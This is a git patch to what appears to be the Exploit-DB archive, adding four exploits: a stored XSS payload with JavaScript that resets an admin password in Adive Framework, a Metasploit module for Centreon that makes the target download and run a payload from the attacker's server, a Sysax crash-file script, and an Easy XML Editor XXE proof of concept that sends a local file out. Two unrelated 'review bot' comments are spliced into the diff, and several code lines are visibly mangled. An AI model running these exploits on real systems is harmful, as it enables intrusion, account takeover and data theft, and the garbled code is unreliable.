From b8cbcf2571ac02fc681dc81b05f5b52d2db66816 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 21 Jan 2020 05:02:10 +0000
Subject: [PATCH] DB: 2020-01-21

4 changes to exploits/shellcodes
Sysax Multi Server 5.50 - Denial of Service (PoC)
Easy XML Editor 1.7.8 - XML External Entity Injection
Adive Framework 2.0.8 - Persistent Cross-Site Scripting
Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)
---
 exploits/php/webapps/47946.txt | 88 ++++++++++++++++
 exploits/php/webapps/47948.rb | 185 +++++++++++++++++++++++++++++++++
 exploits/windows/dos/47947.py | 27 +++++
 exploits/xml/local/47945.txt | 61 +++++++++++
 files_exploits.csv | 4 +
 5 files changed, 365 insertions(+)
 create mode 100644 exploits/php/webapps/47946.txt
 create mode 100755 exploits/php/webapps/47948.rb
 create mode 100755 exploits/windows/dos/47947.py
 create mode 100644 exploits/xml/local/47945.txt
diff --git a/exploits/php/webapps/47946.txt b/exploits/php/webapps/47946.txt
new file mode 100644
index 000000000..398a24b1e
--- /dev/null
+++ b/exploits/php/webapps/47946.txt
@@ -0,0 +1,88 @@
+# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting
+# Exploit Author: Sarthak Saini
+# Dork: N/A
+# Date: 2020-01-18
+# Vendor Link : https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.8
+# Category: Webapps
+# Tested on: windows64bit / mozila firefox
+
+1) Persistent Cross-site Scripting at user add page
+
+Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
+
+Payload:-
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=test&userUsername=&pass=test&cpass=test&permission=3
+
+
+|----------------------------------------------------------------------------------
+
+
+2) account takeover - cross side request forgery
+
+
+Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
+ +-> Save the payload as exp.js + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- +function execute() +{ + var nuri ="http://192.168.2.5/admin/config"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; + xhttp.send(body); + return true; +} + +execute(); +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- + +-> Start a server and host the exp.js. Send the exp.js file in the xss payload + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 + + +-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 + +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/47948.rb b/exploits/php/webapps/47948.rb new file mode 100755 index 000000000..07edb76aa --- /dev/null +++ b/exploits/php/webapps/47948.rb 
@@ -0,0 +1,185 @@ +#################################################################### +# This module requires Metasploit: https://metasploit.com/download # +# Current source: https://github.com/rapid7/metasploit-framework # +#################################################################### + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution", + "Description" => %q{ + Authenticated Remote Code Execution on Centreon Web Appliances. + Affected versions: =< 18.10, 19.04 + By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache. + Vendor verified: 09/17/2019 + Vendor patched: 10/16/2019 + Public disclosure: 10/18/2019 + }, + "License" => MSF_LICENSE, + 'Author' => [ + 'TheCyberGeek', # Discovery + 'enjloezz' # Discovery and Metasploit Module + ], + 'References' => + [ + ['URL','https://github.com/centreon/centreon/pull/7864'], + ['CVE','2019-16405'] + ], + "Platform" => "linux", + "Targets" => [ + ["Centreon", {}], + ], + "Stance" => Msf::Exploit::Stance::Aggressive, + "Privileged" => false, + "DisclosureDate" => "Oct 19 2019", + "DefaultOptions" => { + "SRVPORT" => 80, + }, + "DefaultTarget" => 0 + )) + + register_options( + [ + OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]), + OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]), + OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]), + OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]), + OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]), + ] + 
) + end + + def exploit + begin + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "index.php"), + "method" => "GET", + ) + @phpsessid = res.get_cookies + /centreon_token\".*value=\"(?.*?)\"/ =~ res.body + + unless token + vprint_error("Couldn't get token, check your TARGETURI") + return + end + res = send_request_cgi!( + "uri" => normalize_uri(target_uri.path, "index.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_post" => { + "useralias" => datastore["USERNAME"], + "password" => datastore["PASSWORD"], + "centreon_token" => token, + }, + ) + unless res.body.include? "You need to enable JavaScript to run this app" + fail_with Failure::NoAccess "Cannot login to Centreon" + end + print_good("Login Successful!") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "GET", + "cookie" => @phpsessid, + "vars_get" => { + "p" => "60904", + "o" => "c", + "resource_id" => 1, + }, + ) + /centreon_token\".*value=\"(?.*?)\"/ =~ res.body + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "vars_get" => { + "p" => "60904", + }, + "method" => "POST", + "cookie" => @phpsessid, + "vars_post" => { + "resource_name": "$USER1$", + "resource_line": "/", + "instance_id": 1, + "resource_activate": 1, + "resource_comment": "Nagios Plugins Path", + "submitC": "Save", + "resource_id": 1, + "o": "c", + "initialValues": "" "a:0:{}" "", + "centreon_token": token + }, + ) + begin + Timeout.timeout(datastore["HTTPDELAY"]) { super } + rescue Timeout::Error + vprint_error("Server Timed Out...") + end + rescue ::Rex::ConnectionError + vprint_error("Connection error...") + end + end + + def primer + @pl = generate_payload_exe + @path = service.resources.keys[0] + binding_ip = srvhost_addr + + proto = ssl ? 
"https" : "http" + payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}" + send_payload(payload_uri) + end + + def send_payload(payload_uri) + payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\"" + print_good("Sending Payload") + send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 }, + ) + end + + def on_request_uri(cli, req) + print_good("#{peer} - Payload request received: #{req.uri}") + send_response(cli, @pl) + run_shell + stop_service + end + + def run_shell + print_good("Setting permissions for the payload") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { + "p": "60801", + "command_hostaddress": "", + "command_example": "", + "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"", + "o": "p", + "min": 1, + }, + ) + + print_good("Executing Payload") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { + "p": "60801", + "command_hostaddress": "", + "command_example": "", + "command_line": "/tmp/#{@path}", + "o": "p", + "min": 1, + }, + ) + end +end \ No newline at end of file diff --git a/exploits/windows/dos/47947.py b/exploits/windows/dos/47947.py new file mode 100755 index 000000000..96c19033e --- /dev/null +++ b/exploits/windows/dos/47947.py 
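Review bot: `fail_with Failure::NoAccess "Cannot login to Centreon"` in exploit is missing the comma between the failure class and the message, so Ruby parses it as the call `Failure.NoAccess("Cannot login to Centreon")` and the login-failure path raises NoMethodError instead of reporting the intended failure; it should read `fail_with Failure::NoAccess, "Cannot login to Centreon"`. The option registered in initialize is named `TARGETS`, but send_payload reads `datastore["method"]`, which is never registered, so the option the user sets has no effect on the comparison — the two names need to agree. `send_request_cgi` returns nil when no response arrives, and `res.get_cookies` and `res.body` are dereferenced with no nil check, which the `rescue ::Rex::ConnectionError` around the method does not cover; a `fail_with Failure::Unreachable, "No response from target"` guard after each request would give a clear failure instead of a NoMethodError. The two `centreon_token` regexes show an unnamed group `(?.*?)`, which looks like an extraction loss of the capture name that `token` is later read from; as rendered, `token` would be an undefined local.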
@@ -0,0 +1,27 @@ +# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC) +# Google Dork: NA +# Date: 2020-01-20 +# Exploit Author: Shailesh Kumavat +# Vendor Homepage: https://www.sysax.com/ +# Software Link: https://www.sysax.com/download.htm#sysaxserv +# Version: Sysax Multi Server 5.50 +# Tested on: WIndow 7 +# CVE : [if applicable] + +1) Download software install in window 7 +2)run software then click install license +3) upload crash.key file and it will show run again this program +4 ) program crash , never run + + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffertry: + f=open("crash.key","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!")except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/xml/local/47945.txt b/exploits/xml/local/47945.txt new file mode 100644 index 000000000..5c948f80d --- /dev/null +++ b/exploits/xml/local/47945.txt 
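Review bot: The file in the `try` block is opened with a bare `open()` and closed by hand, so an exception raised by `f.write` leaks the handle, and the bare `except:` catches everything including KeyboardInterrupt while discarding the real error; prefer `with open("crash.key", "w") as f:` around the write and `except OSError as e:` that includes `e` in the message. As rendered, `payload = buffertry:` and `print("[+] File created!")except:` are run together, which looks like line breaks lost in extraction rather than the author's code, so the structure above is inferred.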
@@ -0,0 +1,61 @@ +# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection +# Exploit Author: Javier Olmedo +# Date: 2018-11-21 +# Vendor: Richard Wuerflein +# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe +# Affected Version: 1.7.8 and before +# Patched Version: unpatched +# Category: Local +# Platform: XML +# Tested on: Windows 10 Pro +# CWE: https://cwe.mitre.org/data/definitions/611.html +# CVE: 2019-19031 +# References: +# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/ + +# 1. Technical Description +# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability +# through the malicious XML file. This allows a malicious user to read arbitrary files. + +# 2. Proof Of Concept (PoC) +# 2.1 Start a webserver to receive the connection. + +python -m SimpleHTTPServer 80 + +# 2.2 Upload the payload.dtd file to your web server. + + +"> +%all; + +# 2.3 Create a SECRET.TXT file with any content in desktop. + +# 2.4 Open poc.xml + + +\Desktop\secret.txt"> + +%dtd;]> +&send; + +# 2.5 Your web server will receive a request with the contents of the secret.txt file + +Serving HTTP on 0.0.0.0 port 8000 ... +192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 - +192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 - + +# 3. Timeline +# 13, november 2019 - [RESEARCHER] Discover +# 13, november 2019 - [RESEARCHER] Report to vendor support +# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability +# 15, november 2019 - [RESEARCHER] Detailed vulnerability report +# 22, november 2019 - [RESEARCHER] Public disclosure + +# 4. Disclaimer +# The information contained in this notice is provided without any guarantee of use or otherwise. +# The redistribution of this notice is explicitly permitted for insertion into vulnerability +# databases, provided that it is not modified and due credit is granted to the author. 
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 693f9e61d..e6dc0411e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6659,6 +6659,7 @@ id,file,description,date,author,type,platform,port
 47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android,
 47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
+47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10911,6 +10912,7 @@ id,file,description,date,author,type,platform,port
 47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,
 47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,
 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
+47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42245,3 +42247,5 @@ id,file,description,date,author,type,platform,port
 47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
 47939,exploits/php/webapps/47939.py,"Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass",2020-01-17,"Raphael Karger",webapps,php,
 47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php,
+47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
+47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,